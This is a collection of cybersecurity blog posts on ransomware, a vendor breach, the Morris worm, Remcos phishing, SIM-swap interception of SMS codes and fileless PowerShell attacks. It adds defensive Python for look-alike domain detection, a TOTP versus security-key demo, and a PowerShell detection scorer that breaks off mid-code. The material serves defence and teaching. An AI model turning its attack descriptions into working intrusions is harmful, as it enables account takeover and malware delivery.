Hard Lessons from a Ransomware Attack
A regional county municipality in the province of Quebec, Canada has learned the hard lessons about cybersecurity after it suffered a paralyzing ransomware attack.
Bernard Thompson, reeve of the Mekinac regional county municipality, told The Canadian Press that the ransomware attack that paralyzed the municipality’s servers taught it hard lessons in cybersecurity. “In the end, in terms of the security of our system, [the ransomware attack] was actually positive,” Thompson said.
The cyberattack against Mekinac's servers highlights the importance of protecting your organization's servers against ransomware attacks.
How the Mekinac Cyberattack Unfolded
The Canadian Press reported that on September 10, 2018, municipal employees returning to work after the weekend found a ransomware notice on their computers informing them that their files were locked. The notice demanded 8 Bitcoins, then worth about $65,000, to unlock the files.
The municipality’s servers were disabled for nearly 2 weeks as a result of the ransomware attack. The attack ended when the municipality negotiated and paid $30,000-worth of Bitcoin as ransom payment to unlock the locked files.
“It was hard, clearly, on the moral side of things that we had to pay a bunch of bandits,” Thompson said. He said this was the road that the municipality took as choosing the other way could mean months of data re-entry, costing significantly more than $30,000.
Mekinac’s ransomware attackers are still unidentified and their location not determined to date.
What is a Ransomware Attack?
Ransomware is malicious software (malware) that encrypts files. Encryption is normally a defensive tool: it turns plaintext, or any other data, into ciphertext that can only be read by someone holding the decryption key, which is how organizations keep stolen or intercepted data confidential.
Ransomware turns that tool against the victim. The attackers encrypt the victim’s data with a key only they hold and demand a ransom payment in exchange for the decryption key.
Ransomware reaches computers and servers in several ways. Here are three of the most common:
1. Email-Based Attack
In the Mekinac case, the municipality’s servers were infected after an employee opened a malicious email sent by the attackers and clicked the link it contained. Which ransomware family hit Mekinac’s servers wasn’t disclosed.
The ransomware called “Locky” is an example of a family spread through email spam campaigns. Locky arrives as a Microsoft Office attachment, typically a Word document carrying malicious macros, that slips past antispam filters and tricks the user into opening it and enabling the macros. Once the macros run, Locky encrypts the computer’s files and demands a ransom to unlock them.
2. Drive-By Attack
A drive-by attack is another way attackers infect computers or servers. The Bad Rabbit ransomware is an example of a family distributed through drive-by attacks.
In a drive-by attack, attackers insert malicious code, in this case ransomware, into an insecure website. When a user visits the compromised site, the malware is either downloaded directly to the visitor’s computer or the visitor is redirected to another website controlled by the attackers, from which the malware is downloaded.
3. Unpatched Servers
The ransomware called “SamSam” is an example of a ransomware that infects servers when they’re in an unpatched state. An unpatched server is one that isn’t updated despite the availability of a security update.
Researchers at Cisco Talos, in a blog post, wrote, “Adversaries are exploiting known vulnerabilities in unpatched JBoss servers before installing a web shell, identifying further network connected systems, and installing SamSam ransomware to encrypt files on these devices.”
Lessons from Ransomware Attacks
Thompson, reeve of Mekinac regional county municipality, said that the ransomware attack on Mekinac’s servers taught the municipality to encrypt everything and to analyze every email. “Everything is encrypted now,” Thompson said. “Every email is analyzed before we even receive it. Every day, our system catches malicious emails trying to penetrate – but they are stopped. But the attacks keep coming.”
In addition to encryption and email scanning, here are additional best practices in order to protect your organization’s servers from ransomware attacks:
Back Up Important Files
Keep backups of important files in storage that isn’t connected to your organization’s servers (offline or otherwise isolated copies). If anything happens to the servers, a ransomware attack included, the organization still has clean copies of the files and is not under pressure to pay attackers for the decryption key. Restore from the backups periodically to confirm they actually work; a backup that has never been tested is not a recovery plan.
Keep All Software Up-To-Date
Make sure all of your organization’s software, especially the server operating systems, is up to date. Security updates and patches fix vulnerabilities that cybercriminals are quick to exploit once the fix, and therefore the flaw, is public.
Implement Domain Whitelisting
Allowing connections only to approved domains won’t stop a drive-by download from starting on a compromised site, but it will stop the secondary, attacker-controlled websites that host the payload from loading.
Limit the Number of Users with Administrator Privileges
A computer user with administrator privileges can install and uninstall software and change configuration settings. Restricting that privilege to a small number of personnel means malware delivered through a drive-by attack runs with fewer rights and has less reach across your organization’s servers.
When your organization needs help, our experts are a phone call away. Contact us today to prevent ransomware attacks.
Why the Pentagon Data Breach is a Wake-up Call for Better Screening of Third-party Vendors
On October 14, 2018, news of a major data breach at the Pentagon hit the headlines.
This was a startling, even disturbing, reminder that even the most important, most secure institutions in the world are vulnerable when hackers find a way into their systems. As the Department of Defense’s headquarters, the Pentagon plays a critical role in the United States military and national security: it oversees the Army, Navy, Marine Corps and Air Force, ultimately helping to defend the country.
The very notion that a global symbol of security and power would fall prey to a data breach surprised many, but it shouldn’t have. At a time when cyber-criminals continue to employ increasingly sophisticated techniques to disrupt businesses and organizations of all kinds, this incident is proof positive that proper screening of third-party vendors is critical for effective cybersecurity.
What Data was Involved in The Pentagon Breach?
It’s believed as many as 30,000 employees’ travel records were compromised as a result of the data breach. This includes personal details and credit-card data pertaining to civilians and military personnel: all sensitive information that could have serious financial repercussions if acted upon.
The breach may have first occurred months before it was discovered, and it’s believed the actual number of people potentially affected could rise as the investigation continues. However, no classified information is said to have been compromised.
How Did the Pentagon Breach Happen?
The Pentagon breach was the result of work conducted by a ‘single commercial vendor’ delivering its service to a ‘very small percentage’ of the DoD’s employees. The vendor in question has remained anonymous and was, in the days after the announcement, still contracted to provide its services.
News of the breach came shortly after the U.S. Government Accountability Office confirmed that work had been undertaken to secure the Pentagon’s networks, while placing the security of its weapons systems under closer scrutiny. The GAO said the department faces growing challenges in keeping weapons systems secure as cyber-crime tactics grow more sophisticated.
Pentagon personnel have faced similar issues before. A large attack on the federal Office of Personnel Management in 2015 left the personal details of over 21 million individuals (including people at the Pentagon) compromised. As with this latest incident, the 2015 attack is believed to have begun months before word of it reached the media.
Who was Responsible for The Pentagon Breach?
One or more attackers seized an opportunity to exploit the vendor’s access to the Pentagon’s network, ultimately stealing the travel records. Little else is known.
This incident, though, is a prime example of how ambitious (or, rather, brazen) cyber-criminals are in their choice of targets. While some may focus on distributing ransomware to small businesses in exchange for payment, others are clearly setting their sights a little higher.
The tools and technology available to such individuals empower them to exploit weaknesses in even those systems that should be the most airtight in the world. While the exact circumstances surrounding the vulnerability created by the vendor remain undisclosed, the company responsible is no doubt determined to avoid such an oversight happening again.
It’s also highly likely that the vendor has a strong reputation and valuable experience to have even secured the contract with the Department of Defense in the first place.
This entire incident demonstrates why it’s so vital for businesses and organizations of all sizes, in all sectors, to perform thorough screening of any vendors they intend to work with.
Screening Vendors, Protecting Your Business
No business or organization should ever start working with a vendor without checking their credentials and their background.
Simply settling on the first firm on your radar may not deliver the results you expect — and any mistakes or general incompetence on their part could have major repercussions. You might not have data pertaining to thousands or even millions of civilians in your records, but you could still be risking your customers’ and employees’ privacy by choosing a sub-par team.
If a data breach were to rock your company or organization, the damage could be extensive. First and foremost, those customers whose details have been compromised would be incredibly unlikely to keep working with you in the future.
Fast, effective action can help to minimize the fallout and keep their finances safe from unauthorized access, but their perception of your brand would still be soured.
Your reputation would be affected too, making it more difficult to build trust with new customers or affiliates. That’s not to mention the sheer disruption a breach could cause to your everyday operations, leaving you unable to deliver the services your customers expect for hours, days or longer.
This equates to a potential loss of business and, sadly, income.
Undertaking effective, in-depth screening of your vendors is the smart choice.
Look into any reviews you can find online to learn more about the quality of service previous clients have received. Did they perform as required? Did they use the right processes and achieve the goals they set out to with respect for the client’s security needs?
You may consider approaching some of these clients to get a deeper insight into their experience.
Make sure to speak with prospective vendors at length to get a better idea of how they work, what security measures they take to safeguard systems against breaches, and more. You can only ask so many questions and review so many examples of their prior work before making your decision, but doing your research will help ensure the safest choice for your business or organization.
At The Driz Group, we’re committed to helping our clients stay protected and compliant, minimizing the risk of cyber-attacks using the latest, automated third-party screening technologies. Want to learn more about what we can do for you? Just get in touch!
Look Back into the First Major Cyberattack: The Morris Worm
Thirty years ago, the Morris worm, dubbed the first major cyberattack, was unleashed into the wild, crashing or slowing to a crawl some 6,000 of the roughly 60,000 computers then connected to the “Internet”, about 10% of them.
What Is the Morris Worm?
Morris worm is named after its creator Robert Tappan Morris. A worm, meanwhile, refers to a type of malicious software (malware) that has the ability to spread itself within networks without user interaction.
Court documents showed that Morris, then a first-year graduate student in Cornell University’s computer science Ph.D. program, released the worm on November 2, 1988 from a computer at the Massachusetts Institute of Technology (MIT) that he accessed remotely from a Cornell computer, so that the worm would appear to originate at MIT.
The Morris worm was released a year before the World Wide Web was proposed. The term “Internet” then referred to a U.S. research network connecting computers at universities, research centers and government and military agencies.
In less than 24 hours on November 2, 1988, Morris worm infected the computers of institutions, including Harvard, Princeton, Stanford, Johns Hopkins, National Aeronautics and Space Administration (NASA) and the Lawrence Livermore National Laboratory.
While the worm didn’t destroy or damage files, infected computers slowed to a crawl or ceased functioning and emails were delayed for days. The estimated cost of dealing with the Morris worm at each installation ranged from $200 to over $53,000.
The worm attacked VAX and Sun-3 machines running 4.x BSD Unix using four methods:
First, via a vulnerability in sendmail, the program that transfers and receives electronic mail: its DEBUG mode, left enabled on many systems, accepted commands to execute from a remote sender;
Second, via a buffer overflow in the finger daemon (fingerd), a program that provides limited information about the users of another computer: an over-long request overwrote the stack and ran the worm’s code;
Third, via the "trusted hosts" feature (rsh and rexec with .rhosts and hosts.equiv files), which lets a user with certain privileges on one computer have equivalent privileges on another without entering a password; and
Fourth, via a password guesser that tried a small built-in word list, permutations of the account name and user information, and the words in the system dictionary in rapid succession, hoping that one would be an authorized user’s password. With a correct password, the worm could do whatever that user was authorized to do.
Morris designed the worm to stay hidden and to limit its own spread. Before copying itself onto a computer it asked whether a copy was already running there, and because it lived only in memory it would be killed when the computer was shut down. To defeat administrators who might answer that check with a fake “yes”, however, Morris made the worm reinfect anyway one time in seven. That choice, combined with the check’s unreliability, caused machines to fill with copies of the worm and grind to a halt.
Consequences of the Morris Worm
For unleashing the worm into the wild, Morris became the first person convicted for violating the U.S. Computer Fraud and Abuse Act, which outlaws unauthorized access to protected computers. He was sentenced to 3 years of probation, 400 hours of community service, a fine of $10,050 and the costs of his supervision.
The first major cyberattack showed how vulnerable interconnected computers had become. Within days of the attack, DARPA, the research arm of the Department of Defense, funded the creation of the country’s first computer emergency response team, the CERT Coordination Center at Carnegie Mellon University. Developers also began building intrusion detection software.
On the flip side, the Morris worm inspired a new generation of malicious hackers. In recent memory, the worm whose impact most resembles that of the Morris worm is WannaCry, commonly known as WannaCry ransomware.
In less than 24 hours on May 12, 2017, more than 300,000 computers in 150 countries were infected by WannaCry, each displaying a ransom demand. WannaCry is categorized as a worm because, like the Morris worm, it spreads itself across networks without user interaction.
WannaCry exploited a vulnerability in the SMBv1 (Server Message Block version 1) implementation in Windows, the flaw Microsoft fixed in its MS17-010 update in March 2017 and that the leaked “EternalBlue” exploit targets. SMB lets users access files, printers and other shared resources on a network.
Here are some cybersecurity measures to protect your organization’s computers or networks from worms similar to WannaCry and Morris worms:
Implement Network Segmentation
In network segmentation, vital computers that house critical information and operations are separated from systems exposed to the public internet, and traffic between the segments is restricted to what is actually needed. Segmentation ensures that when an internet-facing computer is infected by a worm, the worm cannot simply reach the vital computers over the network.
Keep All Software Up-to-Date
Make sure that software security updates are installed as timely as possible, not months or years after the release dates of the security updates.
Cyberattackers have automated the process of scanning the internet for finding vulnerable computers – those that fail to install security updates. This was the case for WannaCry victims as they failed to install the security update issued by Microsoft months before the WannaCry cyberattack.
Refrain from Using Legacy Hardware and Software
The term “legacy” refers to old and outdated computer hardware or software. Like computers that don’t install security updates in time, legacy hardware and software are favored targets because their vendors no longer issue security updates for them at all.
Some versions of Windows (Windows XP, Windows 8 and Windows Server 2003) were hit by WannaCry while they were already out of Microsoft’s support. A day after the attack began, Microsoft took the unusual step of releasing security updates for Windows XP, Windows 8 and Windows Server 2003 anyway.
Protecting computers and networks from worms and other malicious software is also a matter of legal compliance. Under Canada’s Digital Privacy Act, from November 1, 2018, private organizations must notify the Privacy Commissioner of Canada and the affected individuals “as soon as feasible” whenever a data breach poses a “real risk of significant harm” to any individual.
When you need help assessing and mitigating cybersecurity risks, contact our team of experts and minimize the likelihood of a data breach.
Latest Phishing Campaign Attempts to Install Remcos Remote Access Tool into Victims' Computers
Thousands of Icelanders have been targeted in a phishing campaign that attempts to install the Remcos remote access tool on victims’ computers, according to a recent report by Cyren.
While the number of victims may seem low, Cyren said this could be the largest cyberattack to hit Iceland, a country with a population of just under 350,000.
Latest Phishing Attack Modus Operandi
Magni Reynir Sigurðsson, senior threat analyst at Cyren, reported that the phishing campaign targeting Icelanders, which has been observed since October 6th, begins with an email impersonating the Lögreglan – Icelandic police. The email requests the recipient to come to the police station for questioning. The email also threatens the recipient that an arrest warrant may be issued in case of non-compliance.
The attackers registered the domain name www[dot]logregian[dot]is. At first glance this looks very similar to the official domain of the Icelandic police, www[dot]logreglan[dot]is: the only difference is that the “l” in the official name has been replaced with an “i”, two letters that are nearly indistinguishable in many fonts. Owning the look-alike domain let the attackers send email from sender addresses ending in “logregian[dot]is”, which at first glance closely resemble the official addresses ending in “logreglan[dot]is”.
The link provided in the phishing email that purportedly leads to additional information about the case leads to the phishing site www[dot]logregian[dot]is that strikingly resembles the official site of the Icelandic police www[dot]logreglan[dot]is.
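The l-for-i swap above is one instance of a general trick: registering a domain whose skeleton, once look-alike characters are collapsed, matches a trusted one. The following added example (not Cyren’s code; the protected-domain list and the sender addresses are constructed for this illustration) flags such sender domains by comparing a confusable-character skeleton and a Damerau-Levenshtein edit distance against a list of domains an organization wants to protect, treating only exact matches and subdomains as legitimate.

```python
"""Flag sender domains that impersonate a protected domain by look-alike
characters, as logregian.is impersonates logreglan.is.

Added illustrative code, not Cyren's. PROTECTED_DOMAINS and the sample
sender addresses below are constructed for this example.
"""
import unicodedata

# Constructed list of domains whose look-alikes we want to catch.
PROTECTED_DOMAINS = ["logreglan.is", "example.com"]

# Single characters easily mistaken for each other in common fonts.
# Each group collapses onto its first member when a skeleton is built.
_CONFUSABLE_GROUPS = ["il1|", "o0", "e3", "a4", "s5", "b8", "z2", "g9", "t7"]
CONFUSABLES = {ch: group[0] for group in _CONFUSABLE_GROUPS for ch in group}
# Character pairs that together resemble one letter.
MULTI_CHAR_CONFUSABLES = [("rn", "m"), ("vv", "w")]


def normalize(domain: str) -> str:
    """Lower-case, strip surrounding whitespace and trailing dots, and fold
    Unicode compatibility forms so fullwidth or ligature characters cannot
    dodge the comparison."""
    return unicodedata.normalize("NFKC", domain).strip().lower().rstrip(".")


def skeleton(domain: str) -> str:
    """Map a domain to a form in which look-alike spellings collide."""
    s = "".join(CONFUSABLES.get(ch, ch) for ch in normalize(domain))
    for pair, single in MULTI_CHAR_CONFUSABLES:
        s = s.replace(pair, single)
    return s


def edit_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein (optimal string alignment) distance: insertions,
    deletions, substitutions and adjacent transpositions each cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def sender_domain(address: str) -> str:
    """Domain part of an e-mail address (everything after the last '@')."""
    return normalize(address.rsplit("@", 1)[-1])


def classify_domain(domain: str, protected=PROTECTED_DOMAINS, max_distance: int = 1):
    """Return ("legitimate" | "lookalike" | "unrelated", matched protected domain).

    A domain is legitimate only if it is a protected domain or a subdomain of
    one; a near miss by skeleton or by edit distance is a look-alike."""
    domain = normalize(domain)
    for p in protected:
        if domain == p or domain.endswith("." + p):
            return "legitimate", p
    for p in protected:
        if skeleton(domain) == skeleton(p) or edit_distance(domain, p) <= max_distance:
            return "lookalike", p
    return "unrelated", None


def triage_senders(addresses):
    """Return the addresses whose domain is a look-alike of a protected domain."""
    return [a for a in addresses if classify_domain(sender_domain(a))[0] == "lookalike"]


if __name__ == "__main__":
    # Constructed sample of sender addresses, modelled on the campaign above.
    samples = [
        "bodun@logregian.is",         # l -> i swap, as in the campaign
        "info@logreglan.is",          # the real police domain
        "noreply@mail.logreglan.is",  # legitimate subdomain
        "billing@exarnple.com",       # rn -> m
        "analyst@cyren.com",          # unrelated
    ]
    for addr in samples:
        print(addr, classify_domain(sender_domain(addr)))
```

This is a triage heuristic for a mail gateway or SOC enrichment step, not a verdict: a legitimate domain one edit away from a protected one will also be flagged, so the output belongs in front of an analyst or an authentication check (SPF, DKIM, DMARC), not in a blocklist by itself.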
The phishing site asks the victim to enter an Icelandic social security number. Unlike most phishing sites, which accept any input, this one validates the number: a wrong number produces an error alert, while a correct one leads to a second phishing page that displays the victim’s actual name. Sigurðsson hypothesized that the phishers were checking the input against a database of Icelanders’ social security numbers and names that was leaked years ago.
Matching the social security number to a real name lends the campaign further credibility. To add to it, the attackers then ask the victim to enter an authentication number contained in the email they received.
Entering the authentication number leads the victim to another phishing webpage that automatically downloads a .rar file that purportedly contains additional document about the case. When this .rar file is extracted, a .scr file (Windows Screensaver) disguised as a Word document with file name “Boðun í skýrslutöku LRH 30 Óktóber.scr”, roughly translated to English as “Called in for questioning by the police on October 30th” is shown.
When this disguised Word document is executed, two files, “Yfirvold.exe” and “Yfirvold.vbs”, are dropped onto the victim’s computer. Sigurðsson said the Yfirvold.vbs file is placed in the Windows Startup folder so that, if the victim reboots, the .vbs script relaunches Yfirvold.exe, a malware that uses the code and components of a known remote access tool called “REMCOS”.
What Is REMCOS?
REMCOS stands for Remote Control & Surveillance Software. This software is sold online by the company called “Breaking Security”. Remcos’ price ranges from €58 to €389. Buyers of Remcos can also pay using a variety of cryptocurrencies.
Breaking Security markets Remcos as a legitimate software that allows users to remotely control and monitor Windows operating system, from Windows XP and all versions thereafter, including server editions. In addition to selling Remcos, Breaking Security also offers Octopus Protector, keylogger and mass mailer. Octopus Protector encrypts a file laden with malware on the disk, allowing it to bypass several antivirus protections. Keylogger records and sends the keystrokes made on a computer, while a mass mailer sends large volumes of emails.
In the campaign targeting Icelanders, according to Sigurðsson, the Remcos installed on victims’ computers comes with keylogging enabled: it collects input from the victims’ keyboards, stores it in logs and uploads the logs to command-and-control servers run by the attackers. These servers, Sigurðsson said, are located in Germany and the Netherlands.
The Remcos build used in the Iceland campaign also checks whether the victim is visiting the websites of the largest online banks in Iceland. According to security researcher MalwareHunterTeam, this is Remcos’s selective keylogger feature, which limits keylogging to chosen applications or websites.
According to researchers at Cisco Talos, Remcos was also used to attack international news agencies, diesel equipment manufacturers operating within the maritime and energy sector, and HVAC service providers operating within the energy sector.
"Since Remcos is advertised and sold on numerous hacking-related forums, we believe it is likely that multiple unrelated actors are leveraging this malware in their attacks using a variety of different methods to infect systems,” researchers at Cisco Talos said.
Like the phishing attack targeting Icelanders, the cyberattacks described by Cisco Talos started with a phishing email, purportedly from a government agency, carrying an attached document.
Embedded into the attached document is a small executable. “The extracted executable is simple and functions as the downloader for the Remcos malware,” Cisco Talos researchers said. “It is a very basic program and is used to retrieve Remcos from an attacker-controlled server and execute it, thus infecting the system.”
While the company behind Remcos claims that its software is meant for legitimate use, data in the wild, including the cyber incidents reported by Cyren and Cisco Talos demonstrate that Remcos is being used by malicious actors.
Remcos is a powerful remote access tool that’s being regularly modified to include new functionalities to remotely control and monitor any Windows operating system.
Make sure your organization has security measures in place against Remcos and other phishing-driven attacks.
When you need help, we are a phone call away. Connect with us today and protect your business.
Reddit Data Breach Highlights Weaknesses of SMS-Based 2-Factor Authentication
Reddit recently announced that it succumbed to a cyberattack, an attack that was born out of the weaknesses inherent to SMS-based 2-factor authentication (2FA).
Reddit, in a statement, said that an attacker gained access to a complete copy of an old database backup containing user data from the site’s launch in 2005 up to May 2007. The data in the backup include usernames with salted, hashed passwords, email addresses, and public and private messages from that period.
The company added that the attacker also accessed email addresses of some current users, along with source code, internal logs, configuration files and other employee workspace files.
While acknowledging that the recent cyberattack was a serious attack, according to Reddit, the attacker didn’t do much damage to the site itself as the attacker only gained read-only access, not write access to Reddit systems.
Reddit said that the attacker entered the company’s systems as a result of the weaknesses inherent to SMS-based 2FA. “Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept,” Reddit said.
What Is Two-Factor Authentication (2FA)?
Two-Factor Authentication, also known as 2FA, is an added layer of protection that’s meant to ensure that security of online accounts goes further than a username and a password.
Here are the three most common forms of 2FA for securing online accounts:
1. SMS-Based 2FA
In SMS-based 2FA, whenever you log-in to your online account, after entering your username and password, a verification code will be sent in a form of an SMS message to your mobile phone. Once the correct verification code is entered after entering the correct username and password, you’ll then gain access to your online account.
In the case of the Reddit cyberattack, it wasn’t disclosed how the attacker carried out the "SMS intercept".
The publicly known scenario for SMS intercept is via SIM swapping, also known as SIM hijacking. In SIM swapping, an attacker calls a cell phone carrier’s tech support pretending to be the target victim and claims that the target’s SIM card is lost. The attacker then requests that the phone number of the target be transferred (also known as ported) to a new SIM card that the attacker already owns.
The attacker in this scam convinces the phone carrier’s tech support to make the necessary transfer of phone number to a new SIM card by providing the target’s personally identifiable information, including Social Security Number or home address, details that are available online after many data breaches from other companies in the past.
Once an attacker convinces the phone carrier’s tech support for the SIM-swap, it’s game over for the target. The immediate effect is that the target loses phone service and any 2FA verification code delivered via SMS is sent to the new SIM card that the attacker controls.
2. App-Based 2FA
In app-based 2FA, you install an app such as Google Authenticator or Authy on your mobile phone or PC. Once configured with a secret shared with the site, the app generates a fresh time-based verification code every 30 seconds, which you enter after your username and password.
Unlike SMS-based 2FA, app-based 2FA keeps working when your phone service is cut off, so SIM swapping doesn’t defeat it. Its downside is that the code is still just a value typed into the same login page as the username and password: a phishing page or a man-in-the-middle proxy that captures all three can relay them to the real site within the code’s validity window and log in.
In a phishing attack, a user is duped into revealing sensitive data, including username and password. In man-in-the-middle attack, the attacker positions himself in a conversation between a user and an application, making it appear as if a normal exchange of information is conducted.
3. Hardware-Based 2FA
Hardware-based 2FA, also known as a physical security key, typically comes in the form of a small USB device (some also work over NFC or Bluetooth). Login is completed by plugging in the key and pressing its button, which eliminates retyping verification codes. The button press proves that someone is physically present at the device, not a remote attacker.
Unlike the SMS-based 2FA and app-based 2FA, in hardware-based 2FA, you don’t need your mobile phone to access your online accounts.
Yubico, the most popular maker of hardware security keys, sells its basic model for about $20. Last month, Google announced that its own hardware security keys, called “Titan Security Keys”, are available to Google Cloud customers and will soon be for sale to anyone on the Google Store.
Also last month, Google told cybersecurity journalist Brian Krebs that since early 2017 more than 85,000 of its employees have been required to use physical security keys, and that since then none of those employees’ work accounts has been successfully phished.
Google said that Titan Security Keys enhanced protection against phishing as the “2-step verification with a security key uses cryptography to provide two-way verification: it makes sure you're logging into the service you originally registered the security key with, and the service verifies that it's the correct security key as well”.
The downside of physical security keys is that they can be lost or stolen. A thief still needs the account password, so a stolen key alone is not game over, but a lost key can lock its owner out. Register a second key as a backup, keep it somewhere safe, and remove a lost key from the account promptly.
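The difference between the app-based codes and the security keys described above comes down to what the second factor actually says. The following added example (not Reddit’s, Google’s or Yubico’s code) implements RFC 6238 TOTP, the algorithm behind authenticator apps, and shows that a code typed into a phishing page can be relayed to the real site because nothing in the code names the site. It then models the origin binding that FIDO/U2F and WebAuthn keys rely on: the browser, not the web page, writes the origin into the signed data, so an assertion produced on a phishing origin fails the real site’s check. One simplification, labelled in the code: a real key signs with a per-site asymmetric private key, whereas here HMAC-SHA256 over the same client data stands in for that signature so the script needs only the standard library. The origins, challenges and secrets are constructed.

```python
"""Why a one-time code is phishable and an origin-bound assertion is not.

Added example, not the code of any vendor named in the article. Part 1 is
RFC 6238 TOTP (built on RFC 4226 HOTP). Part 2 models FIDO/U2F-style origin
binding. SIMPLIFICATION: a real security key signs with an asymmetric private
key; HMAC with a shared secret stands in for that signature here. Origins,
challenges and secrets are constructed.
"""
import hmac
import json
import secrets
import struct

# ---- Part 1: TOTP -----------------------------------------------------------

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP: HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), "sha1").digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """TOTP is HOTP with the counter taken from the current 30-second window."""
    return hotp(secret, unix_time // step, digits)


def verify_totp(secret: bytes, submitted: str, unix_time: int, window: int = 1) -> bool:
    """Accept the current code and one step either side to absorb clock drift."""
    return any(hmac.compare_digest(totp(secret, unix_time + k * 30), submitted)
               for k in range(-window, window + 1))


def totp_relay_attack(secret: bytes, now: int) -> bool:
    """Victim types the code into the phisher's page; the phisher submits it to
    the real site seconds later. The code carries no site identity, so it works."""
    code_typed_into_phishing_page = totp(secret, now)
    return verify_totp(secret, code_typed_into_phishing_page, now + 5)

# ---- Part 2: origin-bound assertions ----------------------------------------

class ToyAuthenticator:
    """Stands in for a security key (shared secret instead of a private key)."""
    def __init__(self) -> None:
        self._secret = secrets.token_bytes(32)

    def registration_key(self) -> bytes:
        return self._secret  # what the site stores at enrolment (a public key in reality)

    def sign(self, browser_origin: str, challenge: str):
        # The browser fills in the origin it is really on; the page cannot lie about it.
        client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                                  "origin": browser_origin}, sort_keys=True).encode()
        return client_data, hmac.new(self._secret, client_data, "sha256").digest()


class RelyingParty:
    """The real site: issues single-use challenges, checks origin and signature."""
    def __init__(self, origin: str, registration_key: bytes) -> None:
        self.origin, self._key, self._outstanding = origin, registration_key, set()

    def new_challenge(self) -> str:
        challenge = secrets.token_urlsafe(32)
        self._outstanding.add(challenge)
        return challenge

    def verify(self, client_data: bytes, signature: bytes) -> bool:
        data = json.loads(client_data)
        if data.get("challenge") not in self._outstanding:
            return False                      # unknown or already-used challenge
        self._outstanding.discard(data["challenge"])
        if data.get("origin") != self.origin:
            return False                      # signed for another site: phishing relay
        expected = hmac.new(self._key, client_data, "sha256").digest()
        return hmac.compare_digest(expected, signature)


def security_key_login(browser_origin: str, real_origin: str = "https://www.reddit.com") -> bool:
    """Enrol a key with the real site, then log in from browser_origin. A phisher
    relays the real challenge to its own page; the key signs the phishing origin
    and the real site rejects the assertion."""
    key = ToyAuthenticator()
    site = RelyingParty(real_origin, key.registration_key())
    challenge = site.new_challenge()
    client_data, signature = key.sign(browser_origin, challenge)
    return site.verify(client_data, signature)


if __name__ == "__main__":
    seed = b"12345678901234567890"                  # RFC 6238 test secret
    print(totp(seed, 59, digits=8))                 # 94287082 (RFC 6238 Appendix B)
    print(totp_relay_attack(seed, 1_500_000_000))   # True: the code relays fine
    print(security_key_login("https://www.reddit.com"))            # True
    print(security_key_login("https://www.reddit-login.example"))  # False
```

In a real deployment the browser additionally refuses to use a credential for any origin other than the one it was registered to, so the assertion in the phishing case is never even produced; the server-side origin check shown here is the defence in depth that WebAuthn requires of the relying party regardless.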
When you have questions concerning your options of better protecting mission critical data, our experts are a phone call away.
Fileless Cyberattacks: They're Getting More Widespread and They're Working
Reports from Ponemon Institute and McAfee Labs have shown that fileless cyberattacks are getting more widespread and they're working.
What Are Fileless Cyberattacks?
Fileless cyberattacks, also called zero-footprint attacks, are attacks designed to evade detection by avoiding, at one stage or another, writing malicious software (malware) to the victim’s disk.
McAfee Labs reported a significant shift by some attackers toward abusing trusted, built-in Windows tools rather than installing external malware to attack computers and office networks.
In the Ponemon Institute’s study “The 2017 State of Endpoint Security Risk”, researchers found that 77% of successful cyberattacks in 2017 used fileless techniques. The study found that fileless attacks are almost 10 times more likely to succeed than file-based attacks.
The terms “fileless” and “zero-footprint” are misnomers. A fileless attack need not be fileless at every stage. For instance, the attack may start with the victim opening a malicious file attached to a spam email, and only once the infection is under way do the attackers switch to fileless techniques.
Attackers can also go the other way: compromise the computer filelessly at the start, for instance by exploiting an unpatched vulnerability, and install conventional malware once access is achieved.
Fileless cyberattacks aren’t also necessarily “zero-footprint” because fileless cyberattacks do leave traces on the victims’ computers if one knows where to look.
There’s, however, justification to the name “fileless cyberattacks” as these attacks don’t exhibit the usual symptoms normally associated with malware infection on the computer disk. As they’re asymptomatic, they’re hard to detect and as such, traditional anti-virus solutions can’t detect them.
Instead of installing the malware into the computer disk, what a fileless attack does is embed the malware in scripts or install the malware into the computer memory and never gets copied to the disk, thereby bypassing endpoint security measures such as anti-virus, which typically rely on file input/output to detect threats.
Examples of Fileless Cyberattacks
Below are examples of how attackers infect victims’ computers filelessly:
1. Fileless Cyberattacks via Microsoft’s Windows PowerShell
One of the ways by which attackers infect victims’ computers filelessly is via Microsoft’s Windows PowerShell.
Microsoft’s Windows PowerShell is Microsoft’s task automation and configuration management framework. Available on Windows 7 onward, Microsoft PowerShell allows full access to Microsoft COM (Component Object Model) and Microsoft Windows Management Instrumentation (WMI). Attackers can access Windows features using Microsoft PowerShell.
One preventive measure against fileless cyberattacks through Microsoft PowerShell is setting its execution policy to "Restricted". According to McAfee Labs, however, attackers can easily get around this restriction by performing “remote execution of a script by directly executing it in memory to bypass endpoint security.”
System administrators bypass the PowerShell restriction in the same manner to execute commands on office computer networks from a remote location via the internet.
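The technique described above leaves a trail in process-creation logs, and that is where a defender catches it. The following scorer is an added example written for this article (it is not McAfee Labs' or Microsoft's code): it flags PowerShell launches whose command line combines a policy bypass, a hidden window, an encoded payload and an in-memory download, and weighs a document reader as the parent process. The log lines are constructed, and their pipe-separated layout is an assumption, not the exact export format of Windows event 4688.

```python
"""Score PowerShell launches for the command-line traits of in-memory execution.

Added example, not from the original article or McAfee Labs. The log lines
below are constructed; the field layout (event|host|user|parent|cmd) is an
assumption of this example, not the exact format of Windows event 4688.
"""
import base64
import re
from typing import Optional

# Rules run against the visible command line plus any decoded -EncodedCommand
# payload. Weights are illustrative; a single hit is normal administration.
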